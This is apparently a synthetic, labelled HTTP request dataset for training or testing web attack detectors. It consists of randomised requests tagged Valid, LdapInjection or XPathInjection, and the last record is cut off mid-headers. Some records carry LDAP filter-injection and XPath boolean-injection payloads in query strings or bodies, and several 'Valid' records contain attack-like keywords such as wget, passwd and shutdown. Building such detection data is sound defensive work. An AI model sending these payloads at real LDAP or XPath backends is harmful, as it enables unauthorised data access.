User-Agent: Mozilla/3.3 (Windows; U; Windows NT 9.6; jt-at; rv:8.2.6) Gecko/94535511
UA-CPU: PowerPC
UA-Disp: 538,106,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 1905x9959
Via: 4.2 140.146.251.205, FTP/8.1 175.197.53.104
Transfer-Encoding: identity
Upgrade: dtya/1.7, sefv5/5.8, i5Baoo/5.8
Warning: 233 127.78.233.52 "baru8" "Tue, 09 Mar 04 09:31:50 CET"
X-Forwarded-For: 75.212.179.183
X-Serial-Number: 733012895588
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37073
Start - Id: 13197
class: Valid
GET /yN@nc6jL@S/eac29rhtSc/jrlrt8edeegps0qee/tnogtspec1wreegaI/eet/Lbplgf_xaJoptQreplacel/xpG.swf?mg=evatytv&luewrv2maa7Psa=ywsn&timhsczsocTCz=pIxlw0lelAjttIeljn&oaxeteTta7o=%25&aegs7wlktsKich=tgP4BL&ieomclnec3aUccl=okm0B3oFDHpz&M1=infrtdaddaeocAg&o9yetbe=Nb&riseot0CIr=sCjyp-QcM&ak=pS%40mm&iIya7p6ahe=mie&anfepwradeo=iq+nijny HTTP/1.0
Host: www.ainren.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.9
Accept-Language: i3oddsi-ie, kdate-hetevm;q=0.1, aeol-xrb1laco;q=0.7, zyuoeAo-thfnvn, oeiu-9eby;q=0.1
Cache-Control: no-transform
Client-ip: 169.235.34.90
Cookie: wh9teas=nnRdropaimg
Cookie2: $Version="70"
Date: Mon, 19 Oct 09 08:32:46 UTC
ETag: "9SRvZ-bzgLmaR8-r8"
Expect: ieT3=ahcnNnn
From: rejnuaHz@hckar.biz
If-Modified-Since: Sun, 24 Dec 06 13:03:28 GMT
If-Unmodified-Since: Mon, 06 Oct 08 23:16:25 CET
If-Match: "hHBLic6@x.xSraadZi"
If-None-Match: "CfeWPoO9Lw2kcRLn7W"
If-Range: Wed, 02 Apr 08 19:36:35 GMT
Max-Forwards: 62
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: ozeoO srxs=iat0pgac
Range: 645-,3478-02,76763-7861
Referer: http://b5t6.net/oiLc.jpg
TE: trailers,gzip;q=0.2,chunked;q=0.6
Trailer: If-Modified-Since
User-Agent: Mozilla/6.4 (X11; U; Solaris 0.7; sh-us; rv:3.4.4) Gecko/44197021
UA-CPU: x86
UA-Disp: 026,187,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 992x6329
Via: HTTP/8.6 www.h5ulc3e.htm, 4lETn/7.9 www.ScggusIr.html, 5.5 www.mfcHzif.tiff
Transfer-Encoding: compress
Upgrade: e0t/7.4
Warning: 751 204.50.136.157 "wlaanseIllOcn4det8i" "Thu, 15 Oct 09 05:51:39 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2985337239117485
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13197
Start - Id: 22119
class: Valid
GET /bJl/aBhtelMiw@leKgr7w38t/OdivzRmCk0/oPIwC5AVSTL/ntcentacaa/ecJ.tiff? HTTP/1.1
Host: www.sst5wabs.fr
Connection: nDipwy
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: eztgaoe=ioyenLhs
Client-ip: 204.187.68.18
Cookie: asuS=20;HeavJ=tlD
Cookie2: $Version="16"
Date: Tue, 03 May 05 07:42:32 GMT
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: zmattjm=t2A2;Raslc=tte9
From: ers7@stiihe.com
If-Modified-Since: Wed, 18 May 05 16:09:23 CET
If-Unmodified-Since: Sat, 26 Nov 05 05:04:55 CET
If-Match: *
If-None-Match: "5yZSx0m@iIcxRHySet"
If-Range: "Mp4wz35w-47kZLGT"
Max-Forwards: 8
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: iad9E rrbbtd=umT68
Authorization: nnib eemrqqyr=tthrnyw
Range: 1976-
Referer: http://ldhpy.be/alAph/nweca.php4
TE: trailers,chunked;q=0.0
Trailer: Range
User-Agent: h9SQTXNR http://www.thi861.gov
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 9980x235
Via: 9.7 www.vsaSi.css
Transfer-Encoding: identity
Upgrade: nistro/9.0, m14h/4.7
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 150.191.145.37
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22119
Start - Id: 27098
class: Valid
GET /nJU4tstP8.Ye/czqlD3Uwt_gw1pd3f/r7tsoahanbfl/ero0/tdoNiiMcd-ukPP_Tu29/iOqc/b8.bin?meMel3a=1rwIl&aalqe8i7eek=shutdownift+pcgam8ieyldhttp&maiamixoe7aduu=+orisRjne%26entwaf5wget%3AW&pT9=a1dmele&hhniqsla=p&uoopta=%5Cgk%3C&Dti=etuacetttdw&9Ann=eEPTA&EoaelAou=me+tiframe&lSc2szwhaybE=73794346&mhantelsnsoei86=328577843&tuq4coqt=pdeitgl9jr6g6w&eeehm=421063290 HTTP/1.1
Host: www.8sy4s.uk
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, identity, gzip;q=0.6
Accept-Language: tiu-aCrqEemE;q=0.0
Cache-Control: no-store
Client-ip: 81.88.14.13
Cookie: xoamrje3anbIs=o8H;eSvlbesal7rpd=8540;aq=lenull;VE3Q8allEv=4;hskeintRmlea=96;UPtnphp=romdb4rnshitoqo
Cookie2: $Version="309"
Date: Mon, 17 Oct 05 24:27:03 GMT
ETag: W/"-K_I8KcrnHjO1jBPvpv"
Expect: 1tohn=atre;ynrrcan=2jQor
From: hhafeiO@hshvl.net
If-Modified-Since: Fri, 01 Aug 08 09:02:40 CET
If-Unmodified-Since: Wed, 10 Feb 10 17:41:59 CET
If-Match: "aIZJ9z39Om-b4q2k"
If-None-Match: "1QuuEABdhooKvuN"
If-Range: "H@vukUaWfX5W7yjBTQ"
Max-Forwards: 166
MIME-Version: 4.2
Pragma: itn4=rsliP
Proxy-Authorization: Digest nc=bF23b1eD
Authorization: oids awihai73=GrSmg
Range: 22-,0045-2456,-6
Referer: http://Eipocndr.st/papmens/o7tistd.aspx
TE: deflate;q=0.7,chunked,trailers
Trailer: Expect
User-Agent: Mozilla/6.4 (X11; U; Unix 4.2; Gd-kd; rv:5.2.4) Gecko/54353001
UA-CPU: Sparc
UA-Disp: 724,7981,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1019x630
Via: oenAn/4.8 www.nwjrtC.html, HTTP/6.9 www.ferta.gif, FTP/8.3 206.91.222.131
Transfer-Encoding: gzip
Upgrade: tii/2.0, axpd/5.6, taa/0.9
Warning: 449 www.kiaeed.tiff "omehrrrangjiAinemo" "Sat, 24 Apr 10 07:58:27 UTC"
X-Forwarded-For: 38.254.21.15
X-Serial-Number: 3641871765037584
----: -------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27098
Start - Id: 38141
class: LdapInjection
GET /dr2hbelwn7othegwd/t@khWCadBYOryOdd/bbhPvselect-Y9havingZ@/2shbTMcY.vd9/scKl2uO@3Bme1.html?_0aBallhavingvmincludeboot.inizf=hrmo&jmetaIZd=u6NBCgz&ofettjec=1134&LC-1h=0114983972&peoifminr=eoh&l9antayscf=nIevo7yt&AEpnlxhteaeeoet=2702579&cthdnaFLetso=tonfaahtissrd8ae&tsy5jfrroxt=y&tyonEhumStcworg=%29+++%28++%7C+%28++cn%3D*o+++%27brien*++++%29%28mail++++%3D*o+++%27brien*+%29++++ HTTP/1.1
Host: 78.228.62.95
Connection: rieEtHO
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.5, windows-1250;q=0.4, cp-950;q=0.1
Accept-Encoding: 
Accept-Language: p-4fhsnhe;q=0.1, lzi-Hp, ssoges-rt9aes, one-w1tqaot0;q=0.8, sIsUi-0athz5
Cache-Control: min-fresh=5
Client-ip: 91.30.161.167
Cookie: E6dke_A_U=06716;betweenscript5andV7F60=430511;1N=etwtHsenel1irTc;nreo1hs=etIecgo9atCeia
Cookie2: $Version="23"
Date: Sat, 19 Apr 08 11:07:33 CET
ETag: W/"98fpe.RdDv1e0Ihe"
Expect: 8ph3Hea
From: N2seGn@3blrbf7rl.uk
If-Modified-Since: Mon, 03 May 10 15:11:59 UTC
If-Unmodified-Since: Sat, 20 Dec 08 01:21:46 CET
If-Match: "Gfx47jftAuUdJGxeZq"
If-None-Match: "-.M-32mUStBWjNK62A"
If-Range: "s1SwB_9s1lCNBy5QIjrN"
Max-Forwards: 7684
MIME-Version: 1.0
Pragma: lOe3=bwe
Proxy-Authorization: sz68gt ghfnil=auo57ahx
Authorization: Basic dGFuZW95eGU6ZXR5YzI=
Range: -49,90-,6-
Referer: http://eSs5tn.ch/wmruvood/oeisjt/orvt/itXcm.htm
TE: deflate;q=0.6,chunked,gzip
Trailer: Proxy-Authorization
User-Agent: gnxes (6@zY0kpM; toCXGn; enzRicx)
UA-CPU: StrongARM
UA-Disp: 072,9161,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 505x614
Via: FTP/1.6 www.umOTiraa.gif, 2.2 www.tE2eobdr.png, HTTP/5.7 www.7n5tssgd.gif
Transfer-Encoding: clau2c
Upgrade: tfcsu/8.0, late/9.1, 9vp6/5.4, h2zo/6.8, hai3pl/9.2
Warning: 953 www.rhr1crat.jpeg "ndt4er0lwh7ihen2iO" 
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 276586158043
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38141
Start - Id: 4281
class: Valid
POST /lEowu4to/1Zn8A3n.z._HbU/eXFmT9be/i3iyoo2sanlntAaSnsah/ens2wagiegm1/ehfKv7q_nZZ.php3? HTTP/1.1
Content-Length: 22
Content-Language: urit6u,zn
Content-Encoding: identity
Content-Location: http://6eascnn.gov/ebnoL/6oohuLs/elroo7it/nyud/eddrx4tt.exe
Content-MD5: ZHdBZWFUaXV0b29lb3JpQQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 14:28:29 CET
Last-Modified: Thu, 20 Jul 06 23:40:52 UTC
Host: www.eeisdkpgt.fr
Connection: keep-alive
Accept: text/xml;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 214.181.125.246
Cookie: wlK=u;elAlwh=tan
Cookie2: $Version="6"
Date: Thu, 17 Feb 05 03:41:07 GMT
ETag: "z9ecNSdG06pxFO.p983v"
Expect: 100-continue
From: d4tmdhbi@dApmaveH.gov
If-Modified-Since: Thu, 09 Nov 06 21:37:40 GMT
If-Unmodified-Since: Sun, 24 Jul 05 18:11:25 CET
If-Match: "w4si0tliVRcGnXUX"
If-None-Match: "OTI3j2A8JnPQT9KG"
If-Range: Wed, 30 Apr 08 15:32:17 GMT
Max-Forwards: 95
MIME-Version: 1.5
Pragma: 7Mettael=r8ei
Proxy-Authorization: Basic dGRsbmM6b2xneWNp
Authorization: Digest username="Odtta4eo"
Range: 557-
Referer: http://www.e5hw.ch/mEthrm/tijhrwu/fhomo/Heac.mpg
TE: gzip
Trailer: Proxy-Authorization
User-Agent: eoetkndee/8.3.4.9
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5153x5817
Via: 5.8 www.lSr9nl.html
Transfer-Encoding: gzip
Upgrade: Unh/4.4
Warning: 787 www.taikmdp.html:2894 "o4xcDruec" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 38250716672
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kswAlog70_Pl=087856942

End - Id: 4281
Start - Id: 31257
class: Valid
GET /f.V2soOCciZpR4PoXbF/se2wgrgNadVmsnnehs.aspx?lsQ0T7T2Iy=et&sut0vososaaen=Y4k1+%3Coomsy&aa=aee%5D&H1vew5gnt=91682733&5poRspneMOa=1&o1LgsetzMc=2&openaEINYallqu90=igWEaAzwh7vq&u7HK-VBd=2Yllll7di&mtntthtp2YpaTet=+eusr%3Da&ylbeo7=55813&annsieuh=216&mdoj=80578&GnrhvvJ=aaeosere5Mtpln HTTP/1.1
Host: 150.41.182.195:2297
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: nSh-e;q=0.3, mttoisii-Ene;q=0.0
Cache-Control: no-store
Client-ip: 188.171.146.100
Cookie: sdegh=59esdneyxFaue
Cookie2: $Version="94"
Date: Mon, 04 Oct 04 09:41:27 GMT
ETag: "Tygs6ik0A00L1OrzfW1b"
Expect: 100-continue
From: etxe3tss@Wattfrd.fr
If-Modified-Since: Mon, 28 Mar 05 12:42:49 GMT
If-Unmodified-Since: Sun, 30 Jan 05 09:06:41 UTC
If-Match: "4JsZfzlq_Da8CYV"
If-None-Match: *
If-Range: *
Max-Forwards: 2509
MIME-Version: 4.6
Pragma: r='tbiT'
Proxy-Authorization: Basic c2FhT2g6MHJPc2xlM3Q=
Authorization: Digest realm
Range: 019-,893-4434
Referer: http://www.Nmtq.st/cyals/sadeRep/feivyatt/tats/sV6uuhl.pl
TE: gzip;q=0.8,deflate,deflate
Trailer: From
User-Agent: sVsLKqM http://www.hAmasr.org
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3795x126
Via: 8.8 www.alyb.png, FTP/5.1 www.mebp5mn.shtml, FTP/4.2 229.188.14.202
Transfer-Encoding: identity
Upgrade: vn4e/1.5, o4t/2.0, qsr1e/6.0, tmD/0.8
Warning: 160 www.s6Dl4nG.js:02 "wyNAeNlmsnn6" 
X-Forwarded-For: 231.214.129.29
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31257
Start - Id: 48692
class: XPathInjection
PUT /lzjulon3II.zi0Vk1/J9-JxKtT/eheoj6deyoetC/rvmry8LO-@TP41FjV1V1/c8mhpmiag3Nee.jpeg? HTTP/1.1
Content-Length: 180
Content-Language: tl,rakd
Content-Encoding: deflate
Content-Location: http://Oeicoe.be/sEmeoe/d4dsWSn.cfm
Content-MD5: ZGVubWxhbm5yb2NpRGVtcg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Sun, 14 Aug 05 01:13:46 UTC
Host: www.afastirti.com
Connection: 9cR1xbM
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity, deflate;q=0.0
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 53.40.104.156
Cookie: ewAntotwc=athetnwd
Cookie2: $Version="590"
Date: Sat, 19 Feb 05 15:03:25 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: oIwoedct
From: Etql@sttawT.de
If-Modified-Since: Tue, 27 Dec 05 08:50:23 GMT
If-Unmodified-Since: Fri, 05 Mar 04 07:19:24 UTC
If-Match: *
If-None-Match: "dM7Chkcs3tfp6l6SM"
If-Range: Wed, 04 Apr 07 02:23:50 UTC
Max-Forwards: 640
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Referer: http://8est.gov/tmj5istn/pqpuar/eeoui7.mpeg
TE: gzip,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/6.1 (compatible; smqgwte; Win98; aTlrbbm2)
UA-Disp: 5095,3013,8
UA-Color: color16
UA-Pixels: 640x9904
Via: HTTP/0.0 103.167.214.94, HTTP/2.6 www.aninteN.html, 7.3 85.137.81.24:732
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
X-Serial-Number: 3185085450816900238
----: ------------------------

amqEdasl37rj=edBemOTBKC&gn=Dr2tlnCo'    or emHii/ndis/child::node()[processing-instruction()=6]    or    'cfete3K6'   =   '&ntUzyiNii=dtpu4pliPsoicf

End - Id: 48692
Start - Id: 5053
class: Valid
PUT /dNk/pt/dibfTTamp2Lxu4Zf/trs8dh/LDocopyyr3I7@H/jS@4GHRD4/lsphpaoincludeK@hf/krtkCTZPYvaropenTidGj/t1pidoe83ri7ewmdcr.css? HTTP/1.0
Content-Length: 51
Content-Language: cxse,iicio7,9ltmhano
Content-Encoding: gzip
Content-Location: http://www.anozsse.gov/IiSihloe/pelrit/uafbngce/sneh.jpg
Content-MD5: aEV1aDJobnRsbXR1Z295RA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 14:34:50 CET
Last-Modified: Wed, 18 Oct 06 14:15:30 UTC
Host: 133.119.234.191
Connection: b4ci
Accept: application/postscript;q=0.6, image/*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 174.11.100.136
Cookie: olq0t=\tcg@senmn;jno4jP=e$;eto8=m|e;cest=267069;ssiqt=6sscm|d<sYni;cEsO=stylelite
Cookie2: $Version="0"
Date: Wed, 05 May 04 09:47:53 UTC
ETag: "G.2NOI9hhXcPwm7wQe"
Expect: 100-continue
From: tpzRon@ec4slh.de
If-Modified-Since: Thu, 22 Jan 09 19:29:31 GMT
If-Unmodified-Since: Fri, 23 Oct 09 15:21:40 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 263
MIME-Version: 5.2
Pragma: atl=Wl
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=8Cd6fc9b
Range: -809077,653-170430,-158191
Referer: http://tleeaW.de/ota7n6/1crLupRR.php3
TE: trailers,deflate,gzip;q=0.3
Trailer: Date
User-Agent: t.BVjadp5 http://www.ggBaon.cz
UA-CPU: MIPS
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7112x1130
Via: FTP/7.6 www.kIluD.css, 9.6 www.iapashom.htm
Transfer-Encoding: deflate
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 770 107.102.226.41 "iZH9taPnr8p" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 2507620494378357
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

rqgeahbnsnrot=yw&r6yOaf=0&hretm8tcmnosau=tdselectwg

End - Id: 5053
Start - Id: 24801
class: Valid
GET /Y@/SPjRsYo@d/ShBmXfKRD/nhtAieEe/FIm.mspx?at4hrkee=48&fai=admint%26fl&tceixns=d%2Fsamus+passwdurkhrcptt6cmdv%28%7E&5@GD4@51=nPQcyRCO%40&sojcpeh=1htaccessystemf4&oyomIeem=7d+e6 HTTP/1.1
Host: www.dlogee.biz
Connection: a0a0inOa
Accept: audio/basic
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: *;q=0.0
Accept-Language: oafCd9b-tdiApniw;q=0.5, rt-E7, iBty-os5g;q=0.8, aUegSbsK-tn, bnid-I
Cache-Control: no-store
Client-ip: 2.144.181.22
Cookie: kacisnrda=evyap;u9GdpuwbwgGlts3=uscRt;ihan6auton=9508
Cookie2: $Version="585"
Date: Fri, 24 Sep 04 24:15:01 UTC
ETag: W/"3M.kholm9_fIPRMrv"
Expect: 100-continue
From: iesi0goR@Pnih.ch
If-Modified-Since: Tue, 22 Dec 09 22:06:33 GMT
If-Unmodified-Since: Thu, 22 Mar 07 21:39:15 GMT
If-Match: "ABkYj1CMJ5kXF29-Ax4"
If-None-Match: "03QKjA36z.qSF.NU6OU"
If-Range: *
Max-Forwards: 282
MIME-Version: 1.4
Pragma: ie51rn=s3noymr
Proxy-Authorization: NTLM YnVvclhlZWZsY3pmb0VFZHVldGIweXVpUjdsZXQwaHlvZXAw
Authorization: NTLM Y2N1Ym01dDJpbXRoZGxlMXRzeDZyYWVlYW50dGFlc2VhSXRpc2NnbG5hdXQz
Range: -5,-50,2-85387
Referer: /o7nue.nsf
TE: trailers,trailers,deflate;q=0.0
Trailer: Via
User-Agent: nzaOvDwA http://www.vToc.de
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3792x2228
Via: HTTP/4.2 www.Nxelan.png:3269
Transfer-Encoding: gzip
Upgrade: hth/9.0, mu3eiy/7.6, tfet8s/2.8, lWeo9d/7.8, oud/9.2
Warning: 846 www.iaYhgar.htm "faTiuonea8seod" 
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 56718
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24801
Start - Id: 16906
class: Valid
GET /lvee7/iM.wEYukGjCYZu/dCeUCigWEYP@Io5mhS/vog8sle2teop.cgi?dhrlh=euur&Eatrr=a&onnfJas=3615668&pfAaoseyjYy=8897&ghnltn3ss=tp+andnsfit&eoqt=thi&di2en=t4i&tbnuyay05=0062 HTTP/1.1
Host: www.ieAStu.gov
Connection: srn4
Accept: video/*;q=0.5
Accept-Charset: x-mac-ce;q=0.0, utf-8;q=0.4, x-mac-hebrew;q=0.2, x-mac-hebrew
Accept-Encoding: gzip;q=0.2, deflate;q=0.9, deflate
Accept-Language: saitld-Os;q=0.1, stE-68ipb, 1szmet-loesbt, sjnEc-hsaweoI;q=0.0
Cache-Control: max-age=9
Client-ip: 254.25.138.231
Cookie: abin5enavpcAdna=ttnondtot;gRmh=9ahPes:n Hitq
Cookie2: $Version="10"
Date: Fri, 01 Jan 10 01:48:32 GMT
ETag: W/"12Ne@V_DU0DcIxV"
Expect: 100-continue
From: lieouw@nat4Ue.st
If-Modified-Since: Sat, 09 Feb 08 16:02:35 UTC
If-Unmodified-Since: Thu, 06 Sep 07 02:25:36 UTC
If-Match: "cVX@Uj53ei_5zxx-iM"
If-None-Match: *
If-Range: "7pv_Hs.VhOJp9lEGUn"
Max-Forwards: 1222
MIME-Version: 7.6
Pragma: Stn='sp'
Proxy-Authorization: Basic MnNzckdkazppYWVhd3JsNQ==
Authorization: eIrf aCo5gdr=nhHiR
Range: -3
Referer: http://asoe.de/aYtadn8m.cgi
TE: trailers,trailers
Trailer: From
User-Agent: u2ZKL5xOQ http://www.h91ely.it
UA-CPU: StrongARM
UA-Disp: 077,285,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 124x8989
Via: HTTP/1.0 www.dumsh.gif, FTP/6.9 233.113.24.174, 4.7 138.132.152.25
Transfer-Encoding: identity
Upgrade: osu/3.4, lZote/5.0, bbZap/2.0, oA2/8.9
Warning: 961 www.El3ett.jpg "wosiueayliee1e9dNy8d" 
X-Forwarded-For: 164.142.194.146
X-Serial-Number: 49349501670921026
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 16906
Start - Id: 38923
class: LdapInjection
GET /pM14OuuWakDNP.php4?includeLbetween4input7=3bs78+eSemacath&m2P0cmd=30521&draSrwv4ns=e3ei%40VfoS2dx&nd4m3s2e=Ur7grghy&ohrkdtxs=283736&ihrnugo=72190125&fkeoe=ci83&te0thlo9te9iNrn=cTeee6JFxrsnifnhet&UeeDlu2c=+tn&5bEY=g9al&sqexoph=ulshiathflstzrY6l&IJdwA7JlIXhL=89%29%28%26%28objectClass%3D9sa%29%28%7C%28sn++%3D+iu3t%29%28cn%3Dw++J*%29%29 HTTP/1.0
Host: www.tbhdvltQ.st:80
Connection: close
Accept: */*;q=0.2
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: p-e2, ix-OriTte;q=0.7, setf-apt;q=0.1, d-2yihu;q=0.3
Cache-Control: min-fresh=1353
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="28"
Date: Sun, 16 Jan 05 14:22:43 UTC
ETag: "YohW@GfSH_k7Q_NUvl"
Expect: hSstt
From: Utnn8c@iodssieo.biz
If-Modified-Since: Wed, 24 May 06 11:50:44 GMT
If-Unmodified-Since: Sun, 12 Jul 09 14:21:09 GMT
If-Match: *
If-None-Match: "J-FCzTREdqFI1ip"
If-Range: Mon, 07 Mar 05 14:02:16 GMT
Max-Forwards: 8
MIME-Version: 7.2
Pragma: n=eOiemeh9
Proxy-Authorization: i69e riaS=otzepawh
Authorization: Basic TTBPZ2g2dGg6aGk3a2Fid0E=
Range: 49-,0149-664723,864-
Referer: /2hEoarn/st2rm/a3s3/oedisl.html
TE: gzip;q=0.2,chunked
Trailer: Pragma
User-Agent: Mozilla/3.1 (X11; U; Unix 9.7; sw-5s; rv:7.3.4) Gecko/91643553
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/2.6 www.elUihiei.png, HTTP/8.6 113.21.215.92, 8.3 121.63.118.97
Transfer-Encoding: gzip
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38923
Start - Id: 2494
class: Valid
GET /aKHAx9Q1S6D73oy/i3y1bMohi.js?9ione=eFSOD&scew7ocnislemh=o%3Ae&hm80oetes=eDR&o-DJ9=90451&ihsohwcadoos=ieNjFnx1mn&3bOtselectcd=++%2BnbetweeneaN HTTP/1.1
Host: www.eRbsmeh.de
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: x-mac-korean;q=0.3, x-mac-roman, iso-2022-kr, windows-1251;q=0.3
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 100.174.188.163
Cookie: ananetsoreooo=|;maiac=Aubl;J4tfaUc0ueogs=hN_;nei4dlrdRe=oK05x7pr;oxerc9= A
Cookie2: $Version="5"
Date: Tue, 13 Mar 07 01:23:12 GMT
ETag: W/"v7wXbGXa2_39d3H2aRx"
Expect: 100-continue
From: oClUhbs@Mlm15siraR.ch
If-Modified-Since: Wed, 07 Jul 04 02:09:10 UTC
If-Unmodified-Since: Wed, 25 Jun 08 11:02:59 GMT
If-Match: *
If-None-Match: "wcp6d1L9K.ewXLaM85D"
If-Range: *
Max-Forwards: 526
MIME-Version: 6.6
Pragma: mu=ah
Proxy-Authorization: Digest response="EfC279DaFeD6E97AE1b75a78EAB78afF"
Authorization: NTLM bnR5VW5hYXJhdG1SMGloRTVzZVlvZWxybGV0aDRTNWF0aU5uZWZhbmRkZWk=
Range: 2954-70305,-2
Referer: /bdroept5/hlnan.bin
TE: trailers
Trailer: Cache-Control
User-Agent: aPJgMOIKv http://www.hrittpe.net
UA-CPU: x86
UA-Disp: 5722,6200,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 301x231
Via: 3.1 107.167.152.1
Transfer-Encoding: hnhj; atcag7=fo6em
Upgrade: tig/6.9, Enn6b4/1.7, cc51/4.1
Warning: 498 158.224.222.62 "n9caasp5evdsDan" 
X-Forwarded-For: 249.11.202.123
X-Serial-Number: 347745233258688600
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2494
Start - Id: 18772
class: Valid
GET /kB5CZeK9ZM@IB5DiZw1/dfstdindDp4/Yktgd9keveaes52/MA8@fwP_-UooPKP/kuhsdMrh63t/PFIUTzwbBmW/hcwia-D4bwLDL/-5GE/46D5AOGl/rG./wGrR6CLl/5sahRp1h8lx0c.png?i2QusrLfromuQ=iwl&osytzpm=4&lJTCOBg_9lCn=hd&f7uoa=s3u9rV2SNM&PxtermCO=967012&dh5ciwd=81275&le5edIazrle=10542&8ou1tki5r=3eii&x6el=Ynee HTTP/1.0
Host: www.oe5l.de
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 55.172.111.88
Cookie: na8ci=26253;esdy=am8keu5pa1tt;SF0xOcLJ=8;z3_nlOiG=eXU.vMd0-V
Cookie2: $Version="939"
Date: Wed, 28 Oct 09 17:38:04 CET
ETag: "F4pahYczbUumgOsX-cl1"
Expect: 100-continue
From: 9Hmsl7@qEiue.biz
If-Modified-Since: Thu, 24 May 07 17:38:52 UTC
If-Unmodified-Since: Tue, 17 May 05 20:52:07 CET
If-Match: "7V8TgYAarmnyJdqgM2Y"
If-None-Match: "ScUZOEl0JwsefFZz"
If-Range: Sun, 30 Nov 08 04:47:48 UTC
Max-Forwards: 63
MIME-Version: 0.4
Pragma: 1b='etwid'
Proxy-Authorization: Digest uri=/1r5fAsr/ectssf/toia.doc
Authorization: Digest algorithm=feLtreau
Range: 1460-
Referer: http://www.KDddutf.de/ksdg/xaev8taE/troMqtou/tge9.php
TE: deflate;q=0.3,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: see7n05tasssAcaltome
UA-CPU: Sparc
UA-Disp: 414,132,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 842x5949
Via: 6.3 www.3sUpnaeh.css, HTTP/7.5 87.135.161.29:415, 7.6 www.ayehm.tiff:090
Transfer-Encoding: compress
